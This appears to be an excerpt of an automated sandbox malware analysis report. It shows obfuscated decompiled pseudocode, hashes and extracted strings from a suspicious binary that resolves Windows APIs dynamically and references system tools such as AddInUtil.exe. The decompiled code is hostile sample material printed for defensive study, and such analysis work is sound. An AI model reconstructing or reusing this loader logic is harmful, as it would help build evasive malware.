                                                          • API ID:
                                                          • String ID: api-ms-win-core-sysinfo-l1-1-0.dll
                                                          • API String ID: 0-3124788603
                                                          • Opcode ID: 5037d76fa7c9218cec471b1fa67a97354ae365782f65e9af5426005bbaa5156d
                                                          • Instruction ID: e2c106303584e9c26e408f4b7b216075225ffd218a3aa7dd954000f6e783491c
                                                          • Opcode Fuzzy Hash: 5037d76fa7c9218cec471b1fa67a97354ae365782f65e9af5426005bbaa5156d
                                                          • Instruction Fuzzy Hash: 35E086347C03029FC700AFA4ACD1FED33A0E328714F90406AA88087281CEAD1C4A9754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005032A3 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E005032A3(void* __eax, intOrPtr __ebx, void* __ecx, void* __eflags) {
				void* _t18;
				void* _t19;

				 *0x5089af = 0x1d035b;
				E004EE3C4(0x1d035b - __ebx, __ebx, __ecx - 0x5e61, 0x8daf, _t18, _t19, __eflags, 0x8daf);
				_push(0x8bc73);
				_push(E005032F3);
				_push(E004F7458);
				return 0x8bc73;
			}





                                                          0x005032c5
                                                          0x005032d0
                                                          0x005032e7
                                                          0x005032e8
                                                          0x005032ed
                                                          0x005032f2

                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65319428b36f4c9dd4099b075ec943f9e784ae6b70a32b8a07ae81fd69cf06c6
                                                          • Instruction ID: ed990ead3f8910f59e1bc9b44fecef06c82ad301223f698cae06c27d551cc680
                                                          • Opcode Fuzzy Hash: 65319428b36f4c9dd4099b075ec943f9e784ae6b70a32b8a07ae81fd69cf06c6
                                                          • Instruction Fuzzy Hash: B9E02624A642029FC700BF3EDC06DB6329BA7B4B3034442723450D37D4DE2A8601875E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004C49C6 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 23%
                                                          			E004C49C6() {
				intOrPtr _t13;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = _t13;
				L004ADF2E(_t13, _t19, _t21, _t22,  *((intOrPtr*)(_t23 - 0x1c)),  *((intOrPtr*)(_t23 - 0x18)),  *((intOrPtr*)(_t23 - 0x20)));
				 *((intOrPtr*)(_t23 - 0x28)) =  *((intOrPtr*)(_t23 - 0x20));
				_push( *((intOrPtr*)(_t23 - 0x10)));
				 *((intOrPtr*)(_t23 - 0x24)) = _t23 - 0x28;
				_push( *((intOrPtr*)(_t23 - 0x24)));
				_push( *((intOrPtr*)(_t23 - 0x18)));
				_push(0);
				_push(1);
				_push(0);
				_push( *((intOrPtr*)(_t23 - 8)));
				_push(0x4c4a08);
				goto ( *0x50928b);
			}








                                                          0x004c49c6
                                                          0x004c49d2
                                                          0x004c49da
                                                          0x004c49dd
                                                          0x004c49e3
                                                          0x004c49e6
                                                          0x004c49e9
                                                          0x004c49ee
                                                          0x004c49ef
                                                          0x004c49f3
                                                          0x004c49f4
                                                          0x004c49f7
                                                          0x004c4a02

                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4c110a7f0249479205fd5740fd73ac64ade66cddeb2532363825864e6d1e70a
                                                          • Instruction ID: 984634b11023cc2a1ec3acfd35d1f05cde5d863d4b41d3797915dc7e1d3ef40e
                                                          • Opcode Fuzzy Hash: d4c110a7f0249479205fd5740fd73ac64ade66cddeb2532363825864e6d1e70a
                                                          • Instruction Fuzzy Hash: CCF0797890020AEEEF058FD0C8829EEBAB6FB08300F20006AE60176164D2765950AB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004C4A53 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E004C4A53() {
				void* _t15;
				void* _t16;

				 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x14)))) =  *((intOrPtr*)(_t16 - 0x20));
				 *__eax =  *((intOrPtr*)(_t16 - 0x1c));
				 *((intOrPtr*)(_t16 - 0x30)) = 1;
				_push( *((intOrPtr*)(_t16 - 0x18)));
				L004ACE34(_t15);
				_push( *((intOrPtr*)(_t16 - 8)));
				_push(E004C4A89);
				goto ( *0x508f43);
			}





                                                          0x004c4a5b
                                                          0x004c4a64
                                                          0x004c4a66
                                                          0x004c4a6d
                                                          0x004c4a70
                                                          0x004c4a75
                                                          0x004c4a78
                                                          0x004c4a83

                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7703a66480a93b02255f9e13a3b02b5a93103f6c8aeaf468ae7bd0832f20ab32
                                                          • Instruction ID: 249b4446d5d1d11c226d8e3daee3aba9f9e2fd6925082780c6b74a994f648ecf
                                                          • Opcode Fuzzy Hash: 7703a66480a93b02255f9e13a3b02b5a93103f6c8aeaf468ae7bd0832f20ab32
                                                          • Instruction Fuzzy Hash: 6FE0BD79A0020AEFCB00CF85E880D9EBBB2FB9C300F004095EA0063320CB75A8159F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A5421 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 421libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 39%
                                                          			E004A5421() {
				intOrPtr _t123;
				char _t125;
				char _t127;
				char _t134;
				intOrPtr _t145;
				char _t148;
				char _t154;
				char _t158;
				signed int _t201;
				signed int _t205;
				intOrPtr _t228;
				short _t262;
				intOrPtr _t271;
				signed int _t274;
				signed int _t275;
				unsigned short _t276;
				void* _t279;
				short _t281;
				intOrPtr _t286;
				void* _t288;
				intOrPtr _t295;
				short _t297;
				short _t302;
				signed short _t323;
				signed int _t324;
				void* _t325;

				 *(_t325 - 0xc) = 0x33c692;
				_push( *0x5080a0);
				 *(_t325 - 0x10) = 0x33c692;
				_t262 =  *0x508146; // 0x93d7
				 *0x508198 = _t262;
				_t295 =  *0x5081e4; // 0x5a9a
				 *0x508166 = _t262;
				_push( *0x5080c8);
				 *(_t325 - 0xc) = "AddInUtil.exe";
				_push( *0x508044);
				 *(_t325 - 0xc) = 0x175b75a;
				 *0x508142 = 0x6877;
				_push( *0x5080d8);
				 *(_t325 - 0xc) = 0x507c52;
				 *0x5080ac =  *0x5080ac;
				 *0x5080c2 =  *0x5080c2;
				 *(_t325 - 0x10) =  *(_t325 - 0x10);
				 *0x508b17 = 0x258b9d;
				_t271 =  *0x508144; // 0x779d
				 *(_t325 - 0xc) =  *(_t325 - 0xc) - 0x2e7d9d;
				 *0x508164 = _t271 - 0x5f0d8e;
				_t274 = 0x525c10;
				_t297 = _t295 - 0x9d + 1;
				_t123 = E005007C9(0xffffffffffffffa4, _t323,  *0x50817c,  *0x5080a0);
				if((0 & _t323) < 0) {
				}
				 *((intOrPtr*)(_t325 - 8)) = _t123;
				_t201 = 0x468401;
				_t125 =  *((intOrPtr*)(_t325 - 8));
				if(_t274 >= _t274) {
					L7:
					_t201 = "ZwLoadKeyEx" & 0x00000029;
					L8:
					_t205 = "GetTickCount64";
					 *0x5080ec =  *0x5080ec - _t205;
					 *((intOrPtr*)(_t325 - 0x2c)) = _t125;
					 *((intOrPtr*)(_t325 - 8)) = _t125;
					if(_t125 == 0x23) {
						L11:
						 *0x50afe5 = _t125;
						L12:
						_t127 =  *0x50afe6; // -97
						_t317 = 0xffffffffff222cf3;
						 *0x50851b = _t127;
						_push( *((intOrPtr*)(_t325 - 0x2c)));
						if(_t205 < 0x2fda33) {
							_t205 =  !_t205 +  !_t205;
							_t274 = _t274 - 0x54e4;
							if(_t274 < _t274) {
								 *0x508168 = _t274;
								_t274 =  *0x5081b8; // 0x0
								 *0x508204 = 0x8c15;
								_t297 = 0;
								_t323 = 0;
								_t317 = 0x5086d1;
							}
						}
						_push( *0x508523);
						_t208 = 0x47e097;
						_t134 =  *((intOrPtr*)(_t325 - 8));
						_t275 =  !_t274;
						 *((intOrPtr*)(_t325 - 8)) = _t134;
						if(_t134 >= 0x22) {
							if(_t134 <= 0x2c876e) {
								_t208 = 0x482202;
								 *0x5080f0 =  *0x5080f0 + 0x482202;
							}
							_t208 = _t208 + _t208;
							if(_t275 < _t275) {
							}
						}
						 *0x5081aa = _t297;
						 *0x50afe1 = _t134;
						 *((intOrPtr*)(_t325 - 8)) = GetProcAddress(??, ??);
						 *(_t325 - 0xc) = 0x2f570b;
						_t276 =  *0x508116; // 0x5c48
						L004668D8(_t276 >> _t276, 0x9825, _t317, _t323, _t276 >> _t276, _t276 >> _t276, _t276 >> _t276);
						_t279 = 0x7cc9;
						 *0x5081d2 = 0x9825;
						_t145 =  *((intOrPtr*)(_t325 - 8));
						 *0x509993 = _t145;
						_t324 = _t323 + _t323;
						 *((intOrPtr*)(_t325 - 8)) = _t145;
						if(_t145 > 0x21) {
							_t279 = 0xffffffffffffff96;
							 *0x50818e =  *0x50818e;
							 *0x5081a8 =  *0x5081a8 + 0xac18;
							if(0x8408 <= 0) {
								_t158 =  *0x50afe3; // -68
								 *0x50afe5 = _t158;
								_t317 = _t317 + 0xd5ba7b;
							}
						}
						 *0x50afdd =  *0x50afdd + _t279;
						 *((intOrPtr*)(_t325 - 0x14)) =  *((intOrPtr*)(_t325 - 0x14)) - _t279;
						_t281 =  *0x5081ac; // 0x9f6d
						_t302 = 0x90bc;
						_push(0);
						_t148 =  *((intOrPtr*)(_t325 - 8));
						 *(_t325 - 0xc) = "EtwEventWriteStartScenario";
						 *(_t325 - 0x10) =  *(_t325 - 0x10) - _t281;
						 *0x50817e = _t281;
						 *0x50821a = 0x90bc;
						if((_t324 & 0x0000aa7a) < 0) {
							if((_t324 & 0x00a70a49) >= 0) {
								 *0x50a8ca =  *0x50a8ca + _t324;
							}
							_t317 = _t317 - 0xf170;
							 *0x50afe6 = _t148;
							if(_t148 > 0x137ab9) {
							}
						}
						 *0x508132 = 0xffffffffffff7cf2;
						_t286 = 0x7c37;
						if(0 == 0) {
							_t302 = 0xa3a3;
							 *0x509de7 =  *0x509de7 - _t324;
						}
						_t228 =  *0x50afe3; // -68
						_push( *0x508218);
						if(_t148 < 0) {
							L34:
							 *0x5081d6 = _t302;
							 *0x5081f0 = _t302;
							_t302 = _t302 - 0xffffffffffff530b;
							 *0x50afe3 = _t148;
							if(_t148 <= 0) {
								goto L38;
							}
							 *0x50afe6 = _t148;
							goto L36;
						} else {
							if(_t148 >= 0x735f3) {
								L36:
								if(_t148 >= 0x20bc) {
									L39:
									 *((intOrPtr*)(_t325 - 0x14)) =  *((intOrPtr*)(_t325 - 0x14)) + _t286;
									 *0x50965b =  *0x50965b - _t302;
									_push( *0x5080a0);
									_t288 = 0x8065;
									 *0x5081f8 = 0;
									 *((intOrPtr*)(_t325 - 8)) = _t148;
									 *(_t325 - 0xc) = 0x3b852c;
									_t154 =  *((intOrPtr*)(_t325 - 8));
									_push( *0x5080a8);
									if(0x8065 >= 0x8065) {
										if(0x8065 < 0x8065) {
											 *0x508168 =  *0x508168 + 0x8065;
										}
										_t288 = _t288 + _t288;
									}
									 *0x50afe5 = _t154;
									_push( *0x50806e);
									 *((intOrPtr*)(_t325 - 8)) = _t154;
									_push(_t154);
									_push(0);
									_push(0);
									_push(0x4a5a32);
									goto __eax;
								}
								_t228 = 0xf3815 + _t148 + 0x3864;
								L38:
								 *(_t325 - 0x10) = _t228 + 0x49;
								_t286 = 0x67b2;
								goto L39;
							}
							 *(_t325 - 0xc) = 0x1c6cba;
							_t228 = 0x398760;
							 *0x50afdd =  *0x50afdd + _t286;
							_t286 =  *0x50818a; // 0x85b0
							goto L34;
						}
					}
					 *0x50afdc =  *0x50afdc - 0x3b2f1a;
					_t205 = 0x1a;
					_t274 = 0x6969;
					 *0x5081ac = _t297;
					_t297 = 0xffffffffff77080d;
					 *0x50afe1 = _t125;
					if((_t323 & 0x00a540fc) >= 0) {
						goto L12;
					} else {
						_t323 = _t323 - 0xc806;
						goto L11;
					}
				}
				if(_t274 <= _t274) {
					L6:
					 *0x5086bd =  *0x5086bd;
					_t201 = _t201 + _t125;
					goto L7;
				}
				_t274 = 0x760b;
				_t297 = 0x508208;
				if((_t323 & 0x0000b51f) <= 0) {
					goto L8;
				} else {
					_t201 =  *0x50afe3; // -68
					goto L6;
				}
			}





























                                                          0x004a5429
                                                          0x004a544c
                                                          0x004a5453
                                                          0x004a5458
                                                          0x004a545f
                                                          0x004a5469
                                                          0x004a5488
                                                          0x004a548f
                                                          0x004a54a3
                                                          0x004a54cb
                                                          0x004a54e3
                                                          0x004a54f2
                                                          0x004a54fe
                                                          0x004a5505
                                                          0x004a5512
                                                          0x004a5519
                                                          0x004a5554
                                                          0x004a5572
                                                          0x004a5583
                                                          0x004a559d
                                                          0x004a55ab
                                                          0x004a55b5
                                                          0x004a55b7
                                                          0x004a55b8
                                                          0x004a55c2
                                                          0x004a55c2
                                                          0x004a55dc
                                                          0x004a55ea
                                                          0x004a55ef
                                                          0x004a55f5
                                                          0x004a5624
                                                          0x004a562e
                                                          0x004a5631
                                                          0x004a5637
                                                          0x004a563c
                                                          0x004a5643
                                                          0x004a5646
                                                          0x004a564b
                                                          0x004a5689
                                                          0x004a5689
                                                          0x004a5691
                                                          0x004a5691
                                                          0x004a5697
                                                          0x004a569d
                                                          0x004a56aa
                                                          0x004a56ba
                                                          0x004a56be
                                                          0x004a56c1
                                                          0x004a56c8
                                                          0x004a56ca
                                                          0x004a56d4
                                                          0x004a56df
                                                          0x004a56e6
                                                          0x004a56e8
                                                          0x004a56f2
                                                          0x004a56f2
                                                          0x004a56c8
                                                          0x004a56fe
                                                          0x004a5710
                                                          0x004a5715
                                                          0x004a5718
                                                          0x004a571a
                                                          0x004a571f
                                                          0x004a5726
                                                          0x004a5728
                                                          0x004a572d
                                                          0x004a572d
                                                          0x004a5734
                                                          0x004a5739
                                                          0x004a5739
                                                          0x004a5739
                                                          0x004a573f
                                                          0x004a5751
                                                          0x004a5764
                                                          0x004a5780
                                                          0x004a5785
                                                          0x004a57aa
                                                          0x004a57b3
                                                          0x004a57ba
                                                          0x004a57d7
                                                          0x004a57da
                                                          0x004a57df
                                                          0x004a57e3
                                                          0x004a57e8
                                                          0x004a57f9
                                                          0x004a57fc
                                                          0x004a5803
                                                          0x004a580f
                                                          0x004a5814
                                                          0x004a581a
                                                          0x004a5821
                                                          0x004a5829
                                                          0x004a582e
                                                          0x004a5841
                                                          0x004a5847
                                                          0x004a5851
                                                          0x004a5858
                                                          0x004a585f
                                                          0x004a586c
                                                          0x004a5874
                                                          0x004a587e
                                                          0x004a5881
                                                          0x004a588f
                                                          0x004a589b
                                                          0x004a58a3
                                                          0x004a58a5
                                                          0x004a58ab
                                                          0x004a58b3
                                                          0x004a58b8
                                                          0x004a58c4
                                                          0x004a58c4
                                                          0x004a58c4
                                                          0x004a58d4
                                                          0x004a58e0
                                                          0x004a58e8
                                                          0x004a58ee
                                                          0x004a58f2
                                                          0x004a58f8
                                                          0x004a58fa
                                                          0x004a5906
                                                          0x004a590f
                                                          0x004a5945
                                                          0x004a5945
                                                          0x004a594c
                                                          0x004a5956
                                                          0x004a595b
                                                          0x004a5963
                                                          0x00000000
                                                          0x00000000
                                                          0x004a5968
                                                          0x00000000
                                                          0x004a5911
                                                          0x004a5918
                                                          0x004a5971
                                                          0x004a597a
                                                          0x004a598f
                                                          0x004a598f
                                                          0x004a5992
                                                          0x004a599b
                                                          0x004a59a5
                                                          0x004a59ad
                                                          0x004a59b6
                                                          0x004a59d0
                                                          0x004a59e5
                                                          0x004a59e8
                                                          0x004a59f1
                                                          0x004a59f5
                                                          0x004a59f7
                                                          0x004a59f7
                                                          0x004a59fe
                                                          0x004a5a00
                                                          0x004a5a10
                                                          0x004a5a17
                                                          0x004a5a1e
                                                          0x004a5a21
                                                          0x004a5a22
                                                          0x004a5a24
                                                          0x004a5a26
                                                          0x004a5a30
                                                          0x004a5a30
                                                          0x004a597e
                                                          0x004a5983
                                                          0x004a5986
                                                          0x004a598b
                                                          0x00000000
                                                          0x004a598b
                                                          0x004a5926
                                                          0x004a592b
                                                          0x004a5930
                                                          0x004a593e
                                                          0x00000000
                                                          0x004a593e
                                                          0x004a590f
                                                          0x004a5654
                                                          0x004a565a
                                                          0x004a5663
                                                          0x004a5667
                                                          0x004a5670
                                                          0x004a5676
                                                          0x004a5682
                                                          0x00000000
                                                          0x004a5684
                                                          0x004a5684
                                                          0x00000000
                                                          0x004a5684
                                                          0x004a5682
                                                          0x004a55f9
                                                          0x004a5619
                                                          0x004a5619
                                                          0x004a5622
                                                          0x00000000
                                                          0x004a5622
                                                          0x004a55fb
                                                          0x004a5608
                                                          0x004a560f
                                                          0x00000000
                                                          0x004a5611
                                                          0x004a5613
                                                          0x00000000
                                                          0x004a5613

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004A575A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: ./R$AddInUtil.exe$CIRCoInst.dll$EtwEventWriteStartScenario$GetTickCount64$System.Web.DynamicData.dll$SystemPropertiesComputerName.exe$ZwLoadKeyEx$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$ddrawex.dll$nshhttp.dll$Nqt
                                                          • API String ID: 190572456-3883461974
                                                          • Opcode ID: 92a14c32943a8ec00913f4038b2ae9c5445bab3a86a31e069b049e1419127c38
                                                          • Instruction ID: 150ccaa013818fe99bded3eeda6018a2b52fea0904a2fa7a6938af653488546b
                                                          • Opcode Fuzzy Hash: 92a14c32943a8ec00913f4038b2ae9c5445bab3a86a31e069b049e1419127c38
                                                          • Instruction Fuzzy Hash: BAF18C79A107069FCB00DFB9E894AEDBBB0FF39310F04807AD994A7352E6781949DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048651B Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 376libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 24%
                                                          			E0048651B(intOrPtr __ebx, void* __edi, void* __esi) {
				signed int _t62;
				signed char _t65;
				signed char _t66;
				signed char _t68;
				signed char _t72;
				signed char _t76;
				_Unknown_base(*)()* _t77;
				signed char _t83;
				signed char _t89;
				intOrPtr _t95;
				signed char _t110;
				void* _t115;
				signed int _t119;
				intOrPtr _t136;
				signed char _t168;
				signed short _t187;
				void* _t193;
				unsigned short _t195;
				unsigned short _t196;
				intOrPtr _t214;
				short _t215;
				signed short _t216;
				void* _t217;
				short _t222;
				intOrPtr _t230;
				void* _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				signed short _t242;
				void* _t246;

				_t235 = __esi;
				_t232 = __edi;
				 *((intOrPtr*)(_t246 - 0x10)) = __ebx;
				_t62 =  *(_t246 - 8);
				_t186 = 0;
				if(0 == 0) {
					_t186 = 0x69902f;
				}
				if(_t186 == _t186) {
					_t215 = 0x953d;
					 *0x50823c = 0x953d;
				}
				_t236 = _t235 + _t235;
				 *0x50834f =  *0x50834f + _t236;
				_push( *0x5080c8);
				_t237 = _t236 - _t232;
				 *0x50afe6 = _t62;
				_t233 = _t232 - _t62;
				 *(_t246 - 8) = _t62;
				if( !_t62 >= 0x30d4) {
					 *((intOrPtr*)(_t246 - 0x10)) =  *((intOrPtr*)(_t246 - 0x10)) + "nshhttp.dll";
					 *0x508120 = _t186;
					_t214 =  *0x50815a; // 0x98
					_t186 = _t214 - 0x645dab;
					_t215 = 0x9f36;
				}
				_t65 =  *(_t246 - 8);
				if(_t65 < 0x1a) {
					if(_t65 <= 0x22) {
						 *((intOrPtr*)(_t246 - 0xc)) =  *((intOrPtr*)(_t246 - 0xc)) - 0x2cbb78;
					}
				}
				_t187 = _t186 - 0x63;
				 *0x50815e =  *0x50815e + _t187;
				_t216 = _t215 + 0x8b;
				_push( *0x50800a);
				_t238 = _t237 - 1;
				if(_t65 < 0) {
					L19:
					 *0x50afd9 =  *0x50afd9 - _t65;
					 *0x5085ab = _t65;
					_t66 = E005007C9( *((intOrPtr*)(_t246 - 0xc)), _t238,  *0x5081ee,  *0x5080d8);
					_t110 =  *0x50afe5; // -1
					 *(_t246 - 8) = _t66;
					if(_t66 > 0x24362f) {
						L27:
						 *0x50afdc =  *0x50afdc + _t110;
						L28:
						E00508174 = 0x609c;
						_t217 = _t216 + 0x8a;
						 *0x5081f8 =  *0x5081f8 - _t217;
						_t239 = 0x50afe1;
						_t68 =  *(_t246 - 8);
						 *(_t246 - 0x2c) = _t68;
						 *(_t246 - 8) = _t68;
						_t115 = 0;
						_t72 =  *(_t246 - 8);
						if(0 > 0x2f07ed) {
							L32:
							_t118 = _t115 + _t72 - 0xfffffffffffffff8;
							L33:
							 *0x5080fc =  *0x5080fc - _t118;
							L34:
							 *0x50afde =  *0x50afde + 0x6cac;
							_t193 = 0x6cac - _t217;
							_push( *(_t246 - 0x2c));
							 *(_t246 - 8) = _t72;
							if(_t72 >= 0x23b306) {
								L38:
								_t119 = 0;
								if(0 < _t193) {
									_t193 = _t193 + 1;
								}
								L40:
								_t195 =  *0x5081a8; // 0x779d
								 *0x509aeb =  *0x509aeb -  !0x8f58;
								L41:
								_t222 = 0;
								_t73 = _t72 + 0xba;
								L42:
								 *0x50afe3 =  *0x50afe3 + _t73;
								_push( *0x508457);
								_t234 = _t233 + _t233;
								 *0x508160 =  *0x508160 - _t195;
								 *((intOrPtr*)(_t246 - 0xc)) = _t119 - 0x50f031;
								_t76 =  *(_t246 - 8);
								if(_t195 < _t195) {
									L47:
									if(_t195 >= _t195) {
										_t195 = 0x6c1a;
									}
									_t196 = _t195 >> _t195;
									L50:
									_t77 = GetProcAddress();
									_t242 =  *0x50823a; // 0x381a
									if((_t242 & 0x0000bbfe) <= 0) {
										L55:
										L56:
										 *0x50afe5 = _t77;
										 *0x50976b = _t77;
										 *(_t246 - 8) = _t77;
										_push(0);
										L00466DA9("EnumWindowStationsA" + "EnumWindowStationsA" ^ 0x000051ca, _t234, _t242, 0,  *(_t246 - 8));
										_t83 =  *(_t246 - 8);
										_t136 = 0;
										 *(_t246 - 8) = _t83;
										if(_t83 < 0x26a9) {
											_t136 = 0xffffffffffffffff;
											 *0x508100 =  *0x508100;
										}
										_push( *0x5080ce);
										 *0x508aef = _t136;
										_t89 =  *(_t246 - 8);
										if(0x33a0d8 != 0x33a0d8) {
											 *0x508192 = 0x6d3d;
										}
										 *0x50afe1 = _t89;
										 *(_t246 - 8) = _t89;
										_push( *0x5080e6);
										_t204 = 0x6af6;
										if("xmllite.dll" == 0x367076) {
											_t204 = 0x6aa1;
											 *0x508166 = 0x6af6;
										}
										_push(1);
										_push(_t204 + _t204);
										_push(E00486A9F);
										_push(L00466DA9);
										return 0x2139af;
									}
									 *0x50afe6 = _t77;
									_t234 = _t234 - _t77;
									if(_t196 - 0x6e31 != _t196 - 0x6e31) {
										goto L56;
									}
									 *0x5081a2 =  *0x5081a2 + 0x9b69;
									if(8 < 0) {
									}
									 *0x50823e = _t242;
									 *0x50afe1 = _t77;
									goto L55;
								}
								_t196 = _t195 + _t195;
								if(_t196 > _t196) {
									 *0x5081e4 = _t222;
								}
								 *0x50afe6 = _t76;
								if(_t76 >= 0x1a3dde) {
									goto L50;
								} else {
									 *((intOrPtr*)(_t246 - 0x10)) = _t76 - 0x2f74a4 + 0x44ae;
									goto L47;
								}
							}
							_t119 =  !0x3ffc0f;
							_t193 = 0x6ec3;
							 *0x50afde =  *0x50afde + 0x6ec3;
							_t222 =  *0x5081f0; // 0x6f02
							 *0x50823e = _t239;
							_t239 = 0xffffffffffff2abd;
							 *0x50afe5 = _t72;
							if(_t72 <= 0) {
								goto L40;
							}
							_t73 = 1;
							if(1 != 0x859dd) {
								goto L42;
							}
							_t95 =  *0x5089cb; // 0x3760000
							_t72 = _t95 - 0x30bb;
							if( !0x3ffc0f >=  !0x3ffc0f) {
								goto L41;
							}
							goto L38;
						}
						_t118 = 0x4b50f6;
						if(0x58859c != 0x58859c) {
							goto L34;
						}
						 *0x508148 = 0x58859c;
						 *0x5096e7 =  *0x5096e7 + _t217;
						_t217 = _t217 - 0xa2d2;
						_t118 = 0xb5;
						_t239 =  !0x50afe1;
						if(0x50afe1 < 0) {
							goto L33;
						}
						_t233 = _t233 + 1;
						 *0x50afe6 = _t72;
						_t168 =  *0x50afd8; // -16
						_t115 = _t168 - 0x15f2;
						 *(_t246 - 8) = _t72;
						goto L32;
					}
					if(_t110 != 0x3825) {
						L23:
						_t216 = _t216 - 0x8e4810;
						 *0x50822a =  *0x50822a - _t216;
						 *0x509d27 =  *0x509d27 + _t238;
						L24:
						if(_t238 + _t238 < 0) {
						}
						if(0 == 0x22) {
							goto L28;
						} else {
							goto L27;
						}
					}
					_t110 = _t110 + 0x49;
					 *((intOrPtr*)(_t246 - 0x10)) =  *((intOrPtr*)(_t246 - 0x10)) - _t110;
					if((_t187 & 0x00000061) != (_t187 & 0x00000061)) {
						goto L24;
					}
					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(_t246 - 0x14)) - 0x6f55;
					 *0x5081c2 = _t216;
					_t216 = 0;
					goto L23;
				} else {
					 *0x50afe6 = _t65;
					 *0x50803e =  *0x50803e + _t65;
					if( !0x35ad79 >  !0x35ad79) {
						L16:
						_t233 = _t233 + _t233;
						 *0x50afd8 = _t65;
						L17:
						L18:
						goto L19;
					}
					_t187 = _t216;
					_t230 =  *0x5081ce; // 0xb268
					_t216 = _t230 - 0x9d;
					if((_t216 & 0x0000a259) != 0) {
						goto L17;
					}
					if((_t65 & 0x000000bd) == 0) {
					}
					if((_t65 & _t65) < 0) {
						goto L18;
					} else {
						goto L16;
					}
				}
			}





































                                                          0x0048651b
                                                          0x0048651b
                                                          0x0048651b
                                                          0x0048651e
                                                          0x00486521
                                                          0x00486526
                                                          0x00486528
                                                          0x00486528
                                                          0x00486530
                                                          0x00486539
                                                          0x0048653d
                                                          0x0048653d
                                                          0x00486544
                                                          0x00486546
                                                          0x0048654d
                                                          0x00486554
                                                          0x00486558
                                                          0x0048655d
                                                          0x00486563
                                                          0x0048656c
                                                          0x00486576
                                                          0x00486579
                                                          0x00486580
                                                          0x00486587
                                                          0x00486593
                                                          0x00486599
                                                          0x0048659d
                                                          0x004865a7
                                                          0x004865ab
                                                          0x004865b2
                                                          0x004865b2
                                                          0x004865b7
                                                          0x004865b9
                                                          0x004865bc
                                                          0x004865c3
                                                          0x004865d1
                                                          0x004865d8
                                                          0x004865db
                                                          0x00486650
                                                          0x0048665a
                                                          0x0048666c
                                                          0x00486671
                                                          0x00486676
                                                          0x0048667c
                                                          0x00486684
                                                          0x004866da
                                                          0x004866df
                                                          0x004866e7
                                                          0x004866ee
                                                          0x004866f7
                                                          0x004866fa
                                                          0x00486704
                                                          0x0048670a
                                                          0x0048670d
                                                          0x00486712
                                                          0x00486722
                                                          0x00486732
                                                          0x0048673b
                                                          0x00486787
                                                          0x0048678c
                                                          0x0048678f
                                                          0x0048678f
                                                          0x0048679f
                                                          0x004867a3
                                                          0x004867a9
                                                          0x004867b3
                                                          0x004867b6
                                                          0x004867be
                                                          0x00486824
                                                          0x00486824
                                                          0x00486829
                                                          0x0048682b
                                                          0x0048682b
                                                          0x0048682c
                                                          0x0048682f
                                                          0x0048683c
                                                          0x00486842
                                                          0x00486842
                                                          0x00486845
                                                          0x00486848
                                                          0x00486848
                                                          0x00486853
                                                          0x00486859
                                                          0x00486862
                                                          0x00486871
                                                          0x00486880
                                                          0x00486885
                                                          0x004868d2
                                                          0x004868d5
                                                          0x004868d7
                                                          0x004868d7
                                                          0x004868db
                                                          0x004868e8
                                                          0x004868f2
                                                          0x004868f8
                                                          0x00486904
                                                          0x00486963
                                                          0x0048696b
                                                          0x0048696b
                                                          0x00486970
                                                          0x00486980
                                                          0x0048699a
                                                          0x004869af
                                                          0x004869cd
                                                          0x004869d2
                                                          0x004869d5
                                                          0x004869dc
                                                          0x004869e1
                                                          0x004869e2
                                                          0x004869e2
                                                          0x004869fa
                                                          0x00486a06
                                                          0x00486a23
                                                          0x00486a28
                                                          0x00486a2f
                                                          0x00486a39
                                                          0x00486a40
                                                          0x00486a46
                                                          0x00486a54
                                                          0x00486a68
                                                          0x00486a7f
                                                          0x00486a84
                                                          0x00486a87
                                                          0x00486a87
                                                          0x00486a91
                                                          0x00486a93
                                                          0x00486a94
                                                          0x00486a99
                                                          0x00486a9e
                                                          0x00486a9e
                                                          0x00486916
                                                          0x0048691b
                                                          0x00486941
                                                          0x00000000
                                                          0x00000000
                                                          0x00486943
                                                          0x00486950
